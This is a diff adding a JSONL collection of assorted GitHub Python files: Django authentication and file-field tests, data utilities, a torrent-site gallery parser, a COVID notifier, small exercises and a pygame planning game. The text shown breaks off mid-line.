diff --git "a/6617.jsonl" "b/6617.jsonl" new file mode 100644--- /dev/null +++ "b/6617.jsonl" @@ -0,0 +1,1751 @@ +{"seq_id":"10497637211","text":"from django.test import TestCase\nfrom ..backends import JWTAuthentication\nfrom rest_framework.test import APIClient\nfrom rest_framework.test import APITestCase\nfrom rest_framework import request, authentication, exceptions\nfrom ..models import User\n\n\nclass JwtTestCase(JWTAuthentication, TestCase):\n '''Test JWT authentication for authors-haven'''\n\n def setUp(self):\n \"\"\"Define the test client and other test variables.\"\"\"\n\n self.client = APIClient()\n self.register_url = '/api/users/'\n self.login_url = '/api/users/login/'\n self.get_user_url = '/api/user/'\n\n self.user = {\n \"user\": {\n \"username\": \"dude\",\n \"email\": \"dude1@gmail.com\",\n \"password\": \"password\"\n }\n }\n\n self.response = self.client.post(\n self.register_url, self.user, format='json')\n User.objects.filter(email=\"dude1@gmail.com\").update(is_verified=True)\n self.user_login = self.client.post(\n self.login_url, self.user, format='json')\n\n def test_auth_header_prefix(self):\n self.assertEqual('Token', self.authentication_header_prefix)\n\n def test_user_can_get_token(self):\n self.assertEqual(201, self.response.status_code)\n self.assertIn('user_token', self.user_login.data)\n\n def test_authenticate_credentials(self):\n self.token = self.user_login.data['user_token']\n resp = self._authenticate_credentials(request, self.token)\n\n def test_authenticate(self):\n resp = self.authenticate\n self.assertTrue(resp != None)\n","repo_name":"andela/ah-backend-thor","sub_path":"authors/apps/authentication/tests/test_jwt_auth.py","file_name":"test_jwt_auth.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"896526871","text":"#Numbers from 1 to scope=100 divisible by 8\n\ndef gen_list_divisable_by(scope=None,div=None):\n if not scope:\n scope = 100\n if not div:\n div = 8\n results = []\n for i in range(1,scope+1):\n if (i % div) == 0:\n results.append(i)\n return results\n\nif __name__ == \"__main__\":\n scope=None\n div=None\n while True:\n try:\n scope=input(\"give range: \")\n scope=int(scope)\n break\n except ValueError:\n if not scope: break\n print(\"It's OK\")\n while True:\n try:\n div=input(\"give divisable: \")\n div=int(div)\n break\n except ValueError:\n if not div: break\n print(\"It's OK\")\n print(\"Found \", len(gen_list_divisable_by(scope,div)), \"numbers\")\n ","repo_name":"krzeczyca/praca","sub_path":"projekt_1.py","file_name":"projekt_1.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73095055468","text":"'''\nData-related utilities and helper methods.\nCreated by Basile Van Hoorick.\n'''\n\nfrom __init__ import *\n\n# Library imports.\nimport glob\nimport joblib\n\n# Internal imports.\nimport my_utils\n\ncache = joblib.Memory('cache/', verbose=1)\n\n\n@cache.cache\ndef recursive_listdir(src_dp, extensions=['jpg', 'jpeg', 'png']):\n '''\n :param src_dp (str).\n :param extensions (list of str).\n :return src_fps (list of str).\n '''\n src_fps = []\n \n # Get all full file paths with specified extensions.\n for ext in extensions:\n src_fps += glob.glob(os.path.join(src_dp, '**/*.' + ext.lower()), recursive=True)\n src_fps += glob.glob(os.path.join(src_dp, '**/*.' + ext.upper()), recursive=True)\n src_fps = sorted(src_fps)\n\n # Exclude probably invalid temporary file names starting with a dot.\n src_fps = [fp for fp in src_fps if not(fp.split('/')[-1].startswith('.'))]\n\n return src_fps\n\n\ndef read_video_audio_clip(video_fp, audio_fp, sel_num_frames=16, sel_start_time=None,\n read_audio=True):\n # https://pytorch.org/vision/main/auto_examples/plot_video_api.html\n # https://pytorch.org/vision/stable/io.html#video\n # NOTE: this doesn't work with pixel phone recorded videos.\n av_reader = torchvision.io.VideoReader(video_fp, 'video')\n metadata = copy.deepcopy(av_reader.get_metadata())\n\n video_duration = metadata['video']['duration'][0]\n video_fps = metadata['video']['fps'][0]\n assert video_duration > 0\n assert video_fps > 0\n\n # Set clip boundaries.\n available_frames = round(video_duration * video_fps)\n assert available_frames >= 4\n if sel_num_frames <= 0:\n sel_num_frames = available_frames + 1 # This ensures counter never breaks.\n if sel_start_time == 'random':\n # Max end value leaves a small margin to ensure audio synchronization is always possible.\n start_frame = np.random.randint(0, available_frames - sel_num_frames - 2)\n else:\n # Round to ensure the requested timestamp (in seconds) is followed accurately.\n start_frame = int(np.round(sel_start_time * video_fps))\n start_time = start_frame / video_fps\n end_frame = start_frame + sel_num_frames\n end_time = end_frame / video_fps\n\n # Read clip video frames always.\n av_reader.set_current_stream('video')\n av_reader.seek(start_time)\n frames = []\n video_pts = []\n counter = 0\n\n for frame in av_reader:\n frames.append(frame['data']) # (C, H, W) tensor.\n video_pts.append(frame['pts']) # single float.\n counter += 1\n if counter >= sel_num_frames:\n break\n\n frames = torch.stack(frames, 0) # (T, C, H, W) tensor.\n video_real_start = video_pts[0]\n video_real_end = video_pts[-1] + 1.0 / video_fps\n\n # NOTE: For these requested values to be correct, we assume video_pts is equally spaced with\n # interval = 1 / FPS. Other cases are probably rare and difficult to deal with.\n metadata['vid_avail_frames'] = available_frames\n metadata['vid_duration'] = video_duration\n metadata['vid_fps'] = video_fps\n metadata['vid_start_frame'] = start_frame\n metadata['vid_start_time'] = start_time\n metadata['vid_end_frame'] = end_frame\n metadata['vid_end_time'] = end_time\n metadata['vid_real_start'] = video_real_start\n metadata['vid_real_end'] = video_real_end\n\n # Read clip audio waveform if desired.\n if read_audio:\n if audio_fp is not None:\n av_reader = torchvision.io.VideoReader(audio_fp, 'audio')\n audio_metadata = copy.deepcopy(av_reader.get_metadata())\n metadata['audio'] = audio_metadata['audio']\n\n audio_duration = metadata['audio']['duration'][0]\n audio_sample_rate = metadata['audio']['framerate'][0]\n assert audio_duration > 0\n assert audio_sample_rate > 0\n assert audio_duration >= video_duration\n\n # NOTE: We assume audio packets are always shorter than video frames, and that PTS\n # (presentation timestamp) denotes when to _start_ presenting a packet.\n # https://en.wikipedia.org/wiki/Presentation_timestamp\n av_reader.set_current_stream('audio')\n av_reader.seek(video_real_start - 1.0 / video_fps)\n\n wavelets = []\n audio_pts = []\n counter = 0\n\n for frame in av_reader:\n wavelets.append(frame['data']) # (T, C) tensor with WXYZ if C = 4.\n audio_pts.append(frame['pts']) # single float.\n counter += 1\n if audio_pts[-1] > video_real_end:\n break\n\n waveform = torch.cat(wavelets, 0) # (T, C) tensor with WXYZ if C = 4.\n audio_real_start = audio_pts[0]\n audio_real_end = audio_pts[-1] + wavelets[-1].shape[0] / audio_sample_rate\n\n # NOTE: video_pts and audio_pts have different temporal strides / intervals, i.e.\n # (1 / video_fps) and (wavelet_size / sample_rate) respectively. We sampled audio packets in\n # such a way that it encompasses the video clip, so now we simply concatenate and mark the\n # appropriate subset to take.\n num_samples = waveform.shape[0]\n align_start = (video_real_start - audio_real_start) / (audio_real_end - audio_real_start)\n align_end = (video_real_end - audio_real_start) / (audio_real_end - audio_real_start)\n align_start_idx = int(align_start * num_samples)\n align_end_idx = int(align_end * num_samples)\n\n waveform = waveform[align_start_idx:align_end_idx]\n num_samples_per_frame = audio_sample_rate / video_fps\n nspf_align = waveform.shape[0] / frames.shape[0]\n np.testing.assert_approx_equal(nspf_align, num_samples_per_frame, significant=3)\n\n metadata['aud_duration'] = audio_duration\n metadata['aud_sample_rate'] = audio_sample_rate\n metadata['aud_read_samples'] = num_samples\n metadata['aud_read_real_start'] = audio_real_start\n metadata['aud_read_real_end'] = audio_real_end\n metadata['aud_align_start_idx'] = align_start_idx\n metadata['aud_align_end_idx'] = align_end_idx\n metadata['aud_samples_per_frame'] = num_samples_per_frame\n\n else:\n waveform = None\n audio_pts = None\n\n del av_reader\n del metadata['video']\n del metadata['audio']\n\n return (frames, waveform, video_pts, audio_pts, metadata)\n\n\ndef read_all_images(src_dp, exclude_patterns=None, count_only=False, use_tqdm=False, stack=False,\n early_resize_height=None):\n '''\n :param src_dp (str).\n :return frames (T, H, W, 3) array with float32 in [0, 1].\n '''\n src_fps = list(sorted(glob.glob(os.path.join(src_dp, '*.jpg')) +\n glob.glob(os.path.join(src_dp, '*.png'))))\n\n if count_only:\n return len(src_fps)\n\n if exclude_patterns is not None:\n if not(isinstance(exclude_patterns, list)):\n exclude_patterns = [exclude_patterns]\n for pattern in exclude_patterns:\n src_fps = [fp for fp in src_fps if not(pattern in fp)]\n\n frames = []\n if use_tqdm:\n src_fps = tqdm.tqdm(src_fps)\n\n for fp in src_fps:\n frame = plt.imread(fp)[..., 0:3]\n frame = (frame / 255.0).astype(np.float32)\n\n if early_resize_height is not None and early_resize_height > 0:\n (H1, W1) = frame.shape[:2]\n if H1 > early_resize_height:\n (H2, W2) = (early_resize_height, int(round(early_resize_height * W1 / H1)))\n frame = cv2.resize(frame, (W2, H2), interpolation=cv2.INTER_LINEAR)\n\n frames.append(frame)\n\n if stack: # Otherwise, remain list for efficiency.\n frames = np.stack(frames)\n\n return frames\n\n\ndef read_image_robust(img_path, no_fail=False):\n '''\n Loads and returns an image that meets conditions along with a success flag, in order to avoid\n crashing.\n '''\n try:\n image = plt.imread(img_path).copy() # (H, W) or (H, W, 3) array of uint8.\n success = True\n\n if image.ndim == 2:\n image = np.stack([image] * 3, axis=-1)\n elif image.shape[2] == 1:\n image = np.stack([image[..., 0]] * 3, axis=-1)\n elif image.shape[2] == 4:\n image = image[..., 0:3]\n\n if (image.ndim != 3 or image.shape[2] != 3\n or np.any(np.array(image.strides) < 0)):\n # Either not RGB or has negative stride, so discard.\n success = False\n if no_fail:\n raise RuntimeError(f'ndim: {image.ndim} '\n f'dtype: {image.dtype} '\n f'shape: {image.shape} '\n f'strides: {image.strides}')\n\n except IOError as e:\n # Probably corrupt file.\n image = None\n success = False\n if no_fail:\n raise e\n\n return (image, success)\n\n\ndef pad_div_numpy(div_array, axes, max_size):\n '''\n Adds zeros to the first axis of an array such that it can be collated.\n :param div_array (K, *) array.\n :param axes (tuple) of int.\n :param max_size (int) = M.\n :return (padded_div_array, K).\n padded_div_array (M, *) array.\n K (int).\n '''\n K = -1\n pad_width = [(0, 0) for _ in range(div_array.ndim)]\n\n for axis in axes:\n cur_K = div_array.shape[axis]\n if K == -1:\n K = cur_K\n else:\n assert cur_K == K\n\n pad_width[axis] = (0, max_size - K)\n\n # https://numpy.org/doc/stable/reference/generated/numpy.pad.html\n padded_div_array = np.pad(div_array, pad_width, mode='constant', constant_values=0)\n\n return (padded_div_array, K)\n\n\ndef pad_div_torch(div_tensor, axes, max_size):\n '''\n Adds zeros to the first axis of a tensor such that it can be collated.\n :param div_tensor (K, *) tensor.\n :param axes (tuple) of int.\n :param max_size (int) = M.\n :return (padded_div_tensor, K).\n padded_div_tensor (M, *) tensor.\n K (int).\n '''\n K = -1\n pad_width = [(0, 0) for _ in range(div_tensor.ndim)]\n\n for axis in axes:\n cur_K = div_tensor.shape[axis]\n if K == -1:\n K = cur_K\n else:\n assert cur_K == K\n\n pad_width[axis] = (0, max_size - K)\n\n # https://pytorch.org/docs/stable/generated/torch.nn.functional.pad.html\n pad_width = list(np.array(list(reversed(pad_width))).flatten())\n padded_div_tensor = torch.nn.functional.pad(div_tensor, pad_width, mode='constant', value=0)\n\n return (padded_div_tensor, K)\n\n\ndef clean_remain_reproducible(data_retval):\n '''\n Prunes a returned batch of examples such that it can be reconstructed deterministically.\n This is useful to save space for debugging, evaluation, and visualization, because\n data_retval can be huge.\n '''\n data_retval_pruned = my_utils.dict_to_cpu(\n data_retval, ignore_keys=['todo'])\n\n return data_retval_pruned\n\n\ndef _paths_from_txt(txt_fp):\n # First, simply obtain all non-empty, non-commented lines.\n with open(txt_fp, 'r') as f:\n lines = f.readlines()\n lines = [line.strip() for line in lines]\n lines = [line for line in lines if len(line) > 0]\n lines = [line for line in lines if not(line.lower().startswith('#'))]\n \n # Then, prepend non-existent (presumed relative) paths with the directory of the text file.\n # This allows for sharing text files across machines without having to modify the contents.\n txt_dp = str(pathlib.Path(txt_fp).parent)\n paths = []\n for line in lines:\n if os.path.exists(line):\n paths.append(line)\n else:\n absolute_path = os.path.join(txt_dp, line)\n assert os.path.exists(absolute_path), absolute_path\n paths.append(absolute_path)\n \n return paths\n\n\ndef get_data_paths_from_args(given_data_paths):\n '''\n Converts any text file into the the list of actual paths it contains as lines within.\n '''\n actual_data_paths = []\n for data_path in given_data_paths:\n if data_path.lower().endswith('.txt'):\n actual_data_paths += _paths_from_txt(data_path)\n else:\n actual_data_paths.append(data_path)\n return actual_data_paths\n","repo_name":"basilevh/pytorch-template","sub_path":"data/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":12207,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"17396556469","text":"# -*- coding: utf-8 -*-\nimport logging\nimport re\nimport typing\nfrom typing import Optional\nfrom urllib.parse import urljoin\nfrom collections import defaultdict\n\nfrom core.base.parsers import BaseParser\n\nfrom . import constants, utilities\n\nfrom core.base.types import GalleryData\n\nif typing.TYPE_CHECKING:\n from viewer.models import WantedGallery\n\nlogger = logging.getLogger(__name__)\n\n\nclass Parser(BaseParser):\n name = constants.provider_name\n accepted_urls = [\n urljoin(constants.base_url, constants.view_path),\n urljoin(constants.base_url, constants.torrent_download_path)\n ]\n\n @staticmethod\n def id_from_url(url: str) -> typing.Optional[str]:\n m = re.search(r\"/view/(\\d+)\", url)\n if m and m.group(1):\n return m.group(1)\n else:\n return None\n\n def crawl_urls(self, urls: list[str], wanted_filters=None, wanted_only: bool = False,\n preselected_wanted_matches: Optional[dict[str, list['WantedGallery']]] = None) -> None:\n\n unique_urls = set()\n gallery_data_list = []\n gallery_wanted_lists: dict[str, list['WantedGallery']] = preselected_wanted_matches or defaultdict(list)\n\n if not self.downloaders:\n logger.warning('No downloaders enabled, returning.')\n return\n\n for url in urls:\n\n if not any(word in url for word in self.accepted_urls):\n logger.warning(\"Invalid URL, skipping: {}\".format(url))\n continue\n\n if constants.torrent_download_path in url:\n utilities.view_link_from_download_link(url)\n\n unique_urls.add(url)\n\n for gallery in unique_urls:\n gid = self.id_from_url(gallery)\n if not gid:\n continue\n\n discard_approved, discard_message = self.discard_gallery_by_internal_checks(\n gallery_id=gid,\n link=gallery\n )\n\n if discard_approved:\n if not self.settings.silent_processing:\n logger.info(discard_message)\n continue\n\n gallery_data = GalleryData(gid, self.name, link=gallery)\n gallery_data_list.append(gallery_data)\n\n if not gallery_data_list:\n return\n\n self.pass_gallery_data_to_downloaders(gallery_data_list, gallery_wanted_lists)\n\n\nAPI = (\n Parser,\n)\n","repo_name":"pandabuilder/pandachaika","sub_path":"core/providers/nyaa/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"37"} +{"seq_id":"18174856767","text":"from plyer import notification\nimport requests\nfrom bs4 import BeautifulSoup\nimport time\n\n\ndef notifyMe(title, message):\n notification.notify(\n title=title,\n message=message,\n app_icon='icon.ico',\n timeout=15\n )\n\n\ndef getDatafromUrl(url):\n r = requests.get(url)\n return r.text\n\n\nif __name__ == \"__main__\":\n notifyMe(\"Pranav\", \"Lets fight the spread of this virus together\")\n myhtmldata = getDatafromUrl('https://www.mohfw.gov.in/')\n # print(myhtmldata)\n soup = BeautifulSoup(myhtmldata, 'html.parser')\n # print(soup.prettify())\n mydatastr = \"\"\n for tr in soup.find_all('table')[0].find_all('tr'):\n mydatastr = mydatastr + tr.get_text()\n\n mydatastr = mydatastr[1:]\n itemlist = mydatastr.split('\\n\\n')\n itemlist = itemlist[:len(itemlist)-2]\n print(itemlist)\n state = ('Chandigarh', 'Rajasthan', 'Uttar Pradesh')\n for item in itemlist[:34]:\n datalist = item.split('\\n')\n # print(item)\n # print(datalist)\n if datalist[1] in state:\n # print(datalist)\n nTitle = 'cases of covid-19'\n nText = f\"{datalist[1]}:Ind :{datalist[2]}\"\n notifyMe(nTitle, nText)\n time.sleep(2)\n","repo_name":"pranavelric/Corona-Cases-notif","sub_path":"coronacasesNotification/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13749849736","text":"print(\"Welcome to the rollercoaster!\")\r\n\r\nheight = int(input(\"What is your height in cm? \"))\r\nbill=0\r\n\r\nif height >= 120:\r\n print(\"You can ride the rollercoaster!\")\r\n age = int(input(\"What is your age? \"))\r\n if age < 12:\r\n bill=5\r\n print(\"Child ticket is $5\")\r\n elif age <= 18:\r\n bill=7\r\n print(\"Youth ticket is $7\")\r\n elif age < 45:\r\n bill=12\r\n print(\"Adult ticket is $12\")\r\n elif age >=45 & age <= 55:\r\n print(\"Everything is going to be ok. Have a ride free on us.\")\r\n \r\n want_photo=input(\"Do you want a photo taken? (Y or N) \")\r\n if want_photo==\"Y\":\r\n bill+=3\r\n print(f\"Your final bill is ${bill}\")\r\n else:\r\n print(f\"Your final bill is ${bill}\")\r\n \r\nelse:\r\n print(\"Sorry, you have to grow taller before you can ride.\")\r\n","repo_name":"Kiransala/PythonPractice","sub_path":"rollercoaster4.py","file_name":"rollercoaster4.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"6306837785","text":"import os\nimport pickle\nimport sys\nimport tempfile\nimport unittest\nfrom pathlib import Path\n\nfrom django.core.exceptions import SuspiciousFileOperation\nfrom django.core.files import File, temp\nfrom django.core.files.base import ContentFile\nfrom django.core.files.uploadedfile import TemporaryUploadedFile\nfrom django.db import IntegrityError, models\nfrom django.test import TestCase, override_settings\nfrom django.test.utils import isolate_apps\n\nfrom .models import Document\n\n\nclass FileFieldTests(TestCase):\n def test_clearable(self):\n \"\"\"\n FileField.save_form_data() will clear its instance attribute value if\n passed False.\n \"\"\"\n d = Document(myfile=\"something.txt\")\n self.assertEqual(d.myfile, \"something.txt\")\n field = d._meta.get_field(\"myfile\")\n field.save_form_data(d, False)\n self.assertEqual(d.myfile, \"\")\n\n def test_unchanged(self):\n \"\"\"\n FileField.save_form_data() considers None to mean \"no change\" rather\n than \"clear\".\n \"\"\"\n d = Document(myfile=\"something.txt\")\n self.assertEqual(d.myfile, \"something.txt\")\n field = d._meta.get_field(\"myfile\")\n field.save_form_data(d, None)\n self.assertEqual(d.myfile, \"something.txt\")\n\n def test_changed(self):\n \"\"\"\n FileField.save_form_data(), if passed a truthy value, updates its\n instance attribute.\n \"\"\"\n d = Document(myfile=\"something.txt\")\n self.assertEqual(d.myfile, \"something.txt\")\n field = d._meta.get_field(\"myfile\")\n field.save_form_data(d, \"else.txt\")\n self.assertEqual(d.myfile, \"else.txt\")\n\n def test_delete_when_file_unset(self):\n \"\"\"\n Calling delete on an unset FileField should not call the file deletion\n process, but fail silently (#20660).\n \"\"\"\n d = Document()\n d.myfile.delete()\n\n def test_refresh_from_db(self):\n d = Document.objects.create(myfile=\"something.txt\")\n d.refresh_from_db()\n self.assertIs(d.myfile.instance, d)\n\n @unittest.skipIf(sys.platform == \"win32\", \"Crashes with OSError on Windows.\")\n def test_save_without_name(self):\n with tempfile.NamedTemporaryFile(suffix=\".txt\") as tmp:\n document = Document.objects.create(myfile=\"something.txt\")\n document.myfile = File(tmp)\n msg = f\"Detected path traversal attempt in '{tmp.name}'\"\n with self.assertRaisesMessage(SuspiciousFileOperation, msg):\n document.save()\n\n def test_defer(self):\n Document.objects.create(myfile=\"something.txt\")\n self.assertEqual(Document.objects.defer(\"myfile\")[0].myfile, \"something.txt\")\n\n def test_unique_when_same_filename(self):\n \"\"\"\n A FileField with unique=True shouldn't allow two instances with the\n same name to be saved.\n \"\"\"\n Document.objects.create(myfile=\"something.txt\")\n with self.assertRaises(IntegrityError):\n Document.objects.create(myfile=\"something.txt\")\n\n @unittest.skipIf(\n sys.platform == \"win32\", \"Windows doesn't support moving open files.\"\n )\n # The file's source and destination must be on the same filesystem.\n @override_settings(MEDIA_ROOT=temp.gettempdir())\n def test_move_temporary_file(self):\n \"\"\"\n The temporary uploaded file is moved rather than copied to the\n destination.\n \"\"\"\n with TemporaryUploadedFile(\n \"something.txt\", \"text/plain\", 0, \"UTF-8\"\n ) as tmp_file:\n tmp_file_path = tmp_file.temporary_file_path()\n Document.objects.create(myfile=tmp_file)\n self.assertFalse(\n os.path.exists(tmp_file_path), \"Temporary file still exists\"\n )\n\n def test_open_returns_self(self):\n \"\"\"\n FieldField.open() returns self so it can be used as a context manager.\n \"\"\"\n d = Document.objects.create(myfile=\"something.txt\")\n # Replace the FileField's file with an in-memory ContentFile, so that\n # open() doesn't write to disk.\n d.myfile.file = ContentFile(b\"\", name=\"bla\")\n self.assertEqual(d.myfile, d.myfile.open())\n\n def test_media_root_pathlib(self):\n with tempfile.TemporaryDirectory() as tmp_dir:\n with override_settings(MEDIA_ROOT=Path(tmp_dir)):\n with TemporaryUploadedFile(\n \"foo.txt\", \"text/plain\", 1, \"utf-8\"\n ) as tmp_file:\n document = Document.objects.create(myfile=tmp_file)\n self.assertIs(\n document.myfile.storage.exists(\n os.path.join(\"unused\", \"foo.txt\")\n ),\n True,\n )\n\n def test_pickle(self):\n with tempfile.TemporaryDirectory() as tmp_dir:\n with override_settings(MEDIA_ROOT=Path(tmp_dir)):\n with open(__file__, \"rb\") as fp:\n file1 = File(fp, name=\"test_file.py\")\n document = Document(myfile=\"test_file.py\")\n document.myfile.save(\"test_file.py\", file1)\n try:\n dump = pickle.dumps(document)\n loaded_document = pickle.loads(dump)\n self.assertEqual(document.myfile, loaded_document.myfile)\n self.assertEqual(\n document.myfile.url,\n loaded_document.myfile.url,\n )\n self.assertEqual(\n document.myfile.storage,\n loaded_document.myfile.storage,\n )\n self.assertEqual(\n document.myfile.instance,\n loaded_document.myfile.instance,\n )\n self.assertEqual(\n document.myfile.field,\n loaded_document.myfile.field,\n )\n myfile_dump = pickle.dumps(document.myfile)\n loaded_myfile = pickle.loads(myfile_dump)\n self.assertEqual(document.myfile, loaded_myfile)\n self.assertEqual(document.myfile.url, loaded_myfile.url)\n self.assertEqual(\n document.myfile.storage,\n loaded_myfile.storage,\n )\n self.assertEqual(\n document.myfile.instance,\n loaded_myfile.instance,\n )\n self.assertEqual(document.myfile.field, loaded_myfile.field)\n finally:\n document.myfile.delete()\n\n @isolate_apps(\"model_fields\")\n def test_abstract_filefield_model(self):\n \"\"\"\n FileField.model returns the concrete model for fields defined in an\n abstract model.\n \"\"\"\n\n class AbstractMyDocument(models.Model):\n myfile = models.FileField(upload_to=\"unused\")\n\n class Meta:\n abstract = True\n\n class MyDocument(AbstractMyDocument):\n pass\n\n document = MyDocument(myfile=\"test_file.py\")\n self.assertEqual(document.myfile.field.model, MyDocument)\n","repo_name":"django/django","sub_path":"tests/model_fields/test_filefield.py","file_name":"test_filefield.py","file_ext":"py","file_size_in_byte":7460,"program_lang":"python","lang":"en","doc_type":"code","stars":74132,"dataset":"github-code","pt":"37"} +{"seq_id":"23186264825","text":"from time import sleep\nimport pygame, sys\nfrom pyswip import Prolog, Atom, Functor\n\nprolog = Prolog()\nprolog.consult(\"planning\")\n\npygame.init()\n\nWIDTH = 800 \nHEIGHT = 600\n\nDELAY_TIME = 2\n\nVIDEO_POSITION = ( 300, 212)\nVIDEO_SIZE = ( 300, 200)\n\nscreen = pygame.display.set_mode(( WIDTH, HEIGHT))\nclock = pygame.time.Clock()\n\nbg_surface = pygame.image.load('./image/background.PNG')\nbg_surface = pygame.transform.scale(bg_surface, (WIDTH, HEIGHT))\n\nplayerImg = pygame.image.load('./image/charlecter.png')\nplayerImg = pygame.transform.scale( playerImg, ( 50, 50))\n\ntaskImg = pygame.image.load('./image/task.png')\ntaskImg = pygame.transform.scale(taskImg, ( 50, 50))\n\ndef loadImage( inputList, pathLocation, end ):\n print('loading images...')\n\n for item in range( 1, end):\n path = ( pathLocation + f' ({item}).jpg')\n image = pygame.image.load( path )\n image = pygame.transform.scale( image , VIDEO_SIZE )\n inputList.append( image )\n\ncleanO2Imgs = []\nIMAGE_FILE_LENGTH = 136\nloadImage( cleanO2Imgs, './video/cleanO2filter/cleanFilter', IMAGE_FILE_LENGTH)\n\nfixingLightImgs = []\nIMAGE_FILE_LENGTH = 65\nloadImage( fixingLightImgs, './video/fixingLight/fixLight', IMAGE_FILE_LENGTH)\n\nnavigationImgs = []\nIMAGE_FILE_LENGTH = 118\nloadImage( navigationImgs, './video/navigation/navigation', IMAGE_FILE_LENGTH)\n\nreactorImages = []\nIMAGE_FILE_LENGTH = 429\nloadImage( reactorImages, './video/reactor/reactor', IMAGE_FILE_LENGTH)\n\nrebootWifiImages = []\nIMAGE_FILE_LENGTH = 235\nloadImage( rebootWifiImages, './video/rebootWifi/rebootWifi', IMAGE_FILE_LENGTH)\n\nspots = {'cafereria':(400, 50) ,\n 'northeasthallway':(510 , 110),\n 'weapons':( 565, 57),\n 'o2': ( 520, 190),\n 'navigation':(690, 210),\n 'easthallway':(590, 280),\n 'shields':(550, 380),\n 'communications': (480, 450),\n 'southeasthallway':(450, 400),\n 'storage':(380, 365),\n 'centerhallway':(400, 310),\n 'admin':( 490, 280),\n 'electrical':( 270, 330),\n 'southwesthallway':(250, 460),\n 'lowerengine':(110, 350),\n 'westhallway':(120, 260),\n 'reactor':(57, 220),\n 'security':( 180, 225),\n 'upperengine':(115, 85),\n 'northwesthallway':(250, 120),\n 'medbay':(260, 170)}\n\ntaskVideos = {\n spots['o2'] : cleanO2Imgs,\n spots['electrical'] : fixingLightImgs,\n spots['navigation'] : navigationImgs,\n spots['reactor'] : reactorImages,\n spots['communications'] : rebootWifiImages\n}\n\nqueryTasks = ['goal(clean(filter,true))',\n 'goal(chart(course,true))',\n 'goal(fix(wiring,true))',\n 'goal(start(reactor,true))',\n 'goal(reboot(wifi,true))']\n\nmissionRooms = { 'goal(clean(filter,true))':'o2',\n 'goal(chart(course,true))':'navigation',\n 'goal(fix(wiring,true))':'electrical',\n 'goal(start(reactor,true))':'reactor',\n 'goal(reboot(wifi,true))':'communications'}\n\ntaks = []\n\ntaksSpikes = []\n\nclass Player( pygame.sprite.Sprite ):\n def __init__( self , image = None):\n pygame.sprite.Sprite.__init__( self )\n\n self.width = 50\n self.height = 50\n\n if image == None:\n self.image = pygame.Surface( ( self.width, self.height ))\n self.image.fill( (0, 255, 0) )\n else:\n self.image = image\n \n self.rect = self.image.get_rect()\n self.rect.center = ( spots['cafereria'])\n self.position = spots['cafereria']\n\n def setWidth( self , width ):\n self.width = width\n\n def setHeight( self , height ):\n self.height = height\n\n def setImage( self ):\n self.image = pygame.Surface( ( self.width, self.height ))\n\n def update( self ):\n self.rect.x = self.position[0]\n self.rect.y = self.position[1]\n\n def setPosition( self, position ):\n self.position = position\n \n def getPosition( self ):\n return self.position\n\nclass TaskVideo():\n def __init__( self ):\n self.DELAY_TIME = 100000\n self.images = []\n \n def displayImage( self ):\n for image in self.images:\n screen.blit( image , VIDEO_POSITION ) \n pygame.display.update()\n self.delay()\n\n def delay( self ):\n for _ in range( self.DELAY_TIME ):\n pass\n\n def setImages( self, images ):\n self.images = images \n\ndef displayTask():\n print('0: Clean o2 filter')\n print('1: Chart course')\n print('2: Fix wiring')\n print('3: Start reactor')\n print('4: Reboot wifi')\n print('5 or more: exit')\n\ndef getMoveList( queryList ):\n movePath = []\n #for path in spots:\n # movePath.append( spots[path] )\n for soln in prolog.query(\"a_star(_,P)\"):\n for p in soln[\"P\"]:\n if not isinstance(p, Functor):\n #print(\"task\", p)\n continue\n for args in p.args:\n args = str(args)\n #print(\"goto\", args)\n movePath.append(spots[args])\n break\n\n return movePath\n\ndef getPath( taks ):\n inputing = True\n\n print(\"=========input task=========\") \n while inputing:\n displayTask()\n \n userInput = int( input(\"\\ninput your task you want to do: \") )\n if userInput >= 5:\n inputing = False \n else:\n taks.append( queryTasks[userInput] )\n prolog.assertz(queryTasks[userInput])\n\n print(\"=========end input task=========\")\n\n return getMoveList( queryTasks )\n\ndef delay( delayTime ):\n for _ in range( delayTime * 10000000 ):\n pass\n\ndef inputEvent():\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n if event.type == pygame.MOUSEBUTTONUP:\n pos = pygame.mouse.get_pos()\n print( pos )\n\ndef clearTaskSpikes( taksSpikes ):\n for taksSpike in taksSpikes:\n taksSpike.setPosition( (-50, -50) )\n\ndef displayVideo( previousePlayerPosition, taskPosition, taksSpikes, taskVideo ):\n taskIndex = taskPosition.index( previousePlayerPosition )\n taskPosition.pop( taskIndex )\n clearTaskSpikes( taksSpikes )\n\n for task in range( len(taskPosition) ):\n taksSpikes[ task ].setPosition( taskPosition[task] )\n\n taskVideo.setImages( taskVideos[ previousePlayerPosition ] )\n taskVideo.displayImage()\n\n###########################################################################################################################################\n#add player\nall_sprites = pygame.sprite.Group()\nplayer = Player( playerImg )\nall_sprites.add( player )\n\n#taskVideo\ntaskVideo = TaskVideo()\n\n#add task\nfor i in range( 5 ): \n task = Player( taskImg )\n taksSpikes.append( task )\n task.setPosition( (-50, -50) )\n all_sprites.add( task )\n \n#init change var\nmoveList = []\ntaskPosition = []\nlistIndex = 0\npreviousePlayerPosition = 0\ndisplayVideoFlag = False\ngetInput = True\n\nwhile True:\n inputEvent()\n \n #input task\n if getInput == True:\n for task in taks: prolog.retract(task)\n \n taks = []\n\n player.setPosition( spots[ 'cafereria' ] )\n moveList = getPath( taks )\n getInput = False\n \n #setPoition for task\n for task in range( len( taks ) ):\n taskPoistion = taks[ task ] \n missionName = missionRooms[ taskPoistion ]\n\n taksSpikes[ task ].setPosition( spots[missionName] )\n taskPosition.append( spots[missionName] )\n \n delay( 5 )\n \n #finsh all tasks\n elif listIndex == len(moveList):\n displayVideo( 